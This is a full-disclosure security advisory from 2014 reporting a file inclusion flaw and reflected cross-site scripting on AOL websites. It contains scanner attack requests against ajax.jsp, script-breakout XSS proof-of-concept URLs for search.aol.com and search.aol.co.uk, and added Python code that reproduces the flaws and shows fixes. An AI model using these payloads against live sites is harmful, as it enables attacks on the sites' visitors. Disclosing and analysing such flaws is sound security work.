
AOL File Inclusion / Cross Site Scripting

Posted Jan 22, 2014
Authored by Juan Carlos Garcia

America Online (AOL) suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
SHA-256 | 8a613994798545bcea472db93af4ceb0b66319269963bcb88f660250d728a92b


AOL File Inclusion / Cross Site Scripting
*******************************


Vulnerability time-line
------------------------

-Multiple security advisories sent to the vendor

-No response

-No feedback

-Not fixed

-Another security advisory (and another...)

-No response, no feedback

-Full disclosure


I. VULNERABILITY
-------------------------

#Title: AOL File Inclusion / Cross Site Scripting

#Vendor: http://www.aol.com

#Author: Juan Carlos García (@secnight)
#Author: Francisco Moraga (@btshell)

www.asap-sec.com



II. DESCRIPTION
-------------------------

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers, publishers, and advertisers.

Founded in 1985 as Quantum Computer Services, an online services company, by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or set up international versions of its services. AOL is headquartered at 770 Broadway in New York.


(Wikipedia)

III. PROOF OF CONCEPT
-------------------------


Remote File Inclusion
*******************


Vulnerability description
---------------------------


This script is vulnerable to file inclusion attacks.

It includes a file whose name is built from user-supplied data (the GET parameters m and p of /ajax.jsp).

That data is not validated before being passed to the include, so the caller controls which resource beneath /aol/main/modules/ the server tries to load.



Affected items
----------------

/ajax.jsp (5 scanner findings; GET parameters m and p)


The impact of this vulnerability
--------------------------------
It is possible for a remote attacker to include a file from local or remote resources and/or
execute arbitrary script code with the privileges of the web server.

Caveat: the evidence below shows only that the value of m or p is concatenated into a server-side include path beneath /aol/main/modules/ and that the container then fails to find it (the text "The requested resource (...) is not available" is Tomcat's standard 404 message for a dispatcher target). A remote URL supplied in m or p therefore ends up as a local path component; inclusion of remote content and code execution are the scanner's generic impact statement and are not demonstrated in this advisory.


How to fix this vulnerability
------------------------------
Edit the source code to ensure that input is properly validated. Where possible, make a list of accepted filenames and restrict the input to that list (an exact-match allow-list); a request whose m or p value is not on the list should be rejected rather than cleaned up and passed on.


Attack details (Variant 1)
-----------------

URL-encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg (the trailing ?%00.jpg is the scanner's standard probe for truncating an extension the application may append to the name).

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available

Note that the reported path stops at the ? of the injected value, which is consistent with the value being handed to a server-side dispatcher that treats everything after the ? as a query string.

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response


HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive




Variant 3
---------

URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D



Variant 4
---------

Attack details
----------------
URL-encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistentwebsite.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response
----------
HTTP/1.1 200 OK

Cache-Control: max-age=5
Connection: Keep-Alive

Via: AOL-CACHE

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

test-timestamp: 1390300006644

Content-Type: text/javascript;charset=UTF-8

Content-Length: 142

Keep-Alive: timeout=5, max=100
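
The scanner evidence above and the allow-list fix recommended in "How to fix this vulnerability", worked through in Python as an added example. This is not AOL's code and not the authors' code: the /aol/main/modules/ prefix, the parameter names m and p and the query string are taken from the advisory; the function names, the allow-lists, and the model of a servlet dispatcher splitting a query string off the path are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import parse_qs

# Added example, not AOL's code. The prefix and the parameter names m / p are
# taken from the advisory's error messages and request lines; everything else
# (function names, allow-lists, the container behaviour modelled below) is assumed.
MODULE_ROOT = "/aol/main/modules"

# Assumed allow-lists. The only slot/page names the advisory shows are
# "dynamiclead" and "dynamicleadslide"; a real deployment would list its own.
ALLOWED_SLOTS = {"dynamiclead"}
ALLOWED_PAGES = {"dynamicleadslide"}

# Constructed copy of the advisory's first query string, joined onto one line.
ADVISORY_QUERY = (
    "ajax=1&cv=6&dlItem=432572"
    "&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg"
    "&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over"
    "&vcslot=dynamiclead-video-config&_c=main5"
)


def params_from_query(query: str) -> dict:
    """One level of URL decoding, as the servlet container applies it
    (%2500 therefore becomes the literal text %00, not a NUL byte)."""
    parsed = parse_qs(query, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def vulnerable_module_path(m: str, p: str) -> str:
    """The pattern the evidence points at: user input concatenated into a
    server-side include path with no validation at all."""
    return f"{MODULE_ROOT}/{m}/{p}"


def dispatcher_target(path: str) -> str:
    """Assumed model of a servlet RequestDispatcher: anything after the first
    '?' is treated as a query string, not as part of the resource path. That is
    why the '?%00.jpg' suffix is missing from the advisory's error message."""
    return path.split("?", 1)[0]


def is_under_root(path: str, root: str = MODULE_ROOT) -> bool:
    """Containment check used as defence in depth: normalise '..' segments and
    require the result to stay below the module root."""
    normalised = posixpath.normpath(path)
    return normalised == root or normalised.startswith(root + "/")


class ModuleRejected(ValueError):
    """Raised instead of touching the filesystem when the input is not acceptable."""


def safe_module_path(m: str, p: str) -> str:
    """Hardened loader: exact-match allow-lists first (the fix the advisory
    recommends), then the containment check as a second barrier."""
    if m not in ALLOWED_SLOTS or p not in ALLOWED_PAGES:
        raise ModuleRejected(f"unknown module {m!r}/{p!r}")
    path = f"{MODULE_ROOT}/{m}/{p}"
    if not is_under_root(path):
        raise ModuleRejected(f"path escapes module root: {path!r}")
    return path


def loader_rejects(m: str, p: str) -> bool:
    """True when the hardened loader refuses the pair (used for checks below)."""
    try:
        safe_module_path(m, p)
    except ModuleRejected:
        return True
    return False


def reproduce_advisory_evidence(query: str = ADVISORY_QUERY) -> str:
    """Push the advisory's request through the vulnerable pattern and return the
    resource the container would have looked for."""
    params = params_from_query(query)
    return dispatcher_target(vulnerable_module_path(params["m"], params["p"]))


if __name__ == "__main__":
    params = params_from_query(ADVISORY_QUERY)
    print("vulnerable lookup :", reproduce_advisory_evidence())
    print("hardened rejects  :", loader_rejects(params["m"], params["p"]))
    print("traversal rejected:", loader_rejects("dynamiclead", "../../WEB-INF/web.xml"))
```

Running the advisory's own query through the vulnerable pattern yields exactly the path quoted in the error message. Note the order of the checks in safe_module_path: the containment check on its own would accept the URL-shaped value (it normalises to something still beneath the module root and only "../" traversal trips it), so the allow-list is the control that actually closes the finding, and the containment check is a second barrier against a future loosening of that list.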



Cross Site Scripting
*********************


http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E

Decoded, the s_chn value is </script><script>alert("Secnight and BTshell");</script><script>. The shape of the payload shows where the parameter is reflected: unescaped, inside an existing <script> block. The leading </script> closes that block at the HTML level (an HTML parser ends a script element at the first </script it meets, whatever the JavaScript inside looks like), the injected <script> runs the attacker's code, and the trailing <script> re-opens a script context so that the remainder of the original block is parsed as script rather than shown on the page.


http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E …
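
The breakout described above, and the output encoding that prevents it, as an added Python example. This is not AOL's code and not the authors' code: the parameter name s_chn and the payload come from the advisory's first proof-of-concept URL; the template that reflects s_chn into a JavaScript string literal is an assumption drawn from the shape of the payload, and the function names are mine.

```python
import json
from typing import List
from urllib.parse import unquote

# Added example, not AOL's code. The parameter name s_chn and the payload are
# taken from the advisory's proof-of-concept URL; the template that reflects
# s_chn into a <script> block is an assumption drawn from the payload's shape.

# Constructed from the advisory's first PoC URL: the value of s_chn, still URL-encoded.
POC_S_CHN_ENCODED = (
    "%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;"
    "%3C/script%3E%3Cscript%3E"
)


def decoded_poc_value() -> str:
    """The s_chn value as the server sees it after URL decoding."""
    return unquote(POC_S_CHN_ENCODED)


def render_vulnerable(s_chn: str) -> str:
    """Assumed vulnerable template: the raw parameter dropped into a JS string."""
    return f'<script>var s_chn = "{s_chn}";</script><p>search results</p>'


def js_string_literal(value: str) -> str:
    """Encode a value for use inside a <script> block. json.dumps handles quotes,
    backslashes and (through ensure_ascii) U+2028/U+2029; the extra replacements
    turn '<', '>' and '&' into \\uXXXX escapes so that no byte sequence can be
    read by the HTML parser as </script> or as a comment start."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_hardened(s_chn: str) -> str:
    """The same template, with the parameter emitted as a safe JS string literal."""
    return f'<script>var s_chn = {js_string_literal(s_chn)};</script><p>search results</p>'


def script_blocks(html: str) -> List[str]:
    """Return the body of every <script> element, split the way an HTML parser
    does it: a script element ends at the first '</script' after its start tag,
    regardless of what the JavaScript inside looks like."""
    blocks: List[str] = []
    lower = html.lower()
    pos = 0
    while True:
        start = lower.find("<script", pos)
        if start == -1:
            break
        body_start = lower.find(">", start)
        if body_start == -1:
            break
        end = lower.find("</script", body_start + 1)
        if end == -1:
            blocks.append(html[body_start + 1:])
            break
        blocks.append(html[body_start + 1:end])
        pos = end + len("</script")
    return blocks


def attacker_script_isolated(html: str) -> bool:
    """True when some <script> element consists of nothing but the injected
    alert(...) call, i.e. the payload broke out of the intended string literal."""
    return any(block.strip().startswith("alert(") for block in script_blocks(html))


def round_trips(value: str) -> bool:
    """The encoding must not change the value the script actually receives."""
    return json.loads(js_string_literal(value)) == value


if __name__ == "__main__":
    payload = decoded_poc_value()
    print("vulnerable template, script blocks:", script_blocks(render_vulnerable(payload)))
    print("hardened template, script blocks  :", script_blocks(render_hardened(payload)))
```

Against the vulnerable template the HTML parser sees three script elements, the middle one being the attacker's alert on its own; against the hardened template it sees one, and the JavaScript side still receives the original string unchanged. HTML-escaping the value (&lt; and friends) would be wrong here, because inside a script element the HTML parser does not decode entities; the context is a JavaScript string literal, so the encoding has to be a JavaScript one that also keeps the HTML parser from ever seeing a literal "<".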


IV. AUTHORS
-------------------------
Juan Carlos García (@secnight)
Francisco Moraga (@BTshell)
ASAP Security (As Soon As Possible)

www.asap-sec.com

LEGAL NOTICES
--------------

The authors accept no responsibility for any damage caused by the use or misuse of this information.